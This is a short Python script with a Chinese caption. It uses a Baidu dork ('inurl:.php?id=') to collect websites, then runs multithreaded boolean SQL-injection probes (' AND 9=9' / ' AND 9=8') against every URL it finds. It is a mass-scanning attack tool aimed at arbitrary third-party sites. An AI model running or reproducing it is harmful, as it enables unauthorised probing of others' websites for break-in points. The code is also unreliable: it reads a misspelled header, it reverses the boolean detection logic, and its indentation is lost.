通过搜索关键字,获取页面相应网站地址,并用简单的sql注入payload去检测是否存在注入漏洞
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-02-23 18:09:33
# @Author : bb (317716008@qq.com)
# @Word : python can change world!
# @Version : python3.6
import requests
from bs4 import BeautifulSoup
from threading import Thread
from queue import Queue
from time import sleep
q=Queue()
def search(wp,page):
url_list=set()
url='http://www.baidu.com/s?wd='+wp+'&pn='+str((page-1)*10)
res=requests.get(url).content
soup=BeautifulSoup(res,"html.parser")
for i in soup.find_all('a'):
b=i.get('href')
try:
if b !=None:
if b.find('http://www.baidu.com/link?url=')!=-1:
if len(b)<110:
url_list.add(b)
except:
continue
# for i in url_list:
# print(i,len(url_list))
return url_list
def tranurl(url_list):
for i in url_list:
#print(i)
try:
r=requests.get(i)
url=r.url
if url.find('top.baidu.com')==-1:
q.put(url)
print('[+]',url)
except:
continue
def scan():
print('[info]Scan Thread is running')
while 1:
sleep(0.5)
curl=q.get()
payload={'src':curl,'bool_true':curl+' AND 9=9','bool_false':curl+' AND 9=8'}
print('[scan]'+curl)
try:
r_src=requests.get(payload['src']).headers['content-lenth']
r_bool_true=requests.get(payload['bool_true']).headers['content-lenth']
bool_false=requests.get(payload['bool_false']).headers['content-lenth']
except:
continue
if r_src==r_bool_true:
if r_bool_true==bool_false:
print('[*Bigo!*]',curl)
def work(wp,page):
print('[info]start search......')
url_list=search(wp,page)
tranurl(url_list)
if __name__ == '__main__':
for i in range(10): ###设置多线程数量
t=Thread(target=scan)
t.start()
for i in range(2):
work('inurl:.php?id=',i)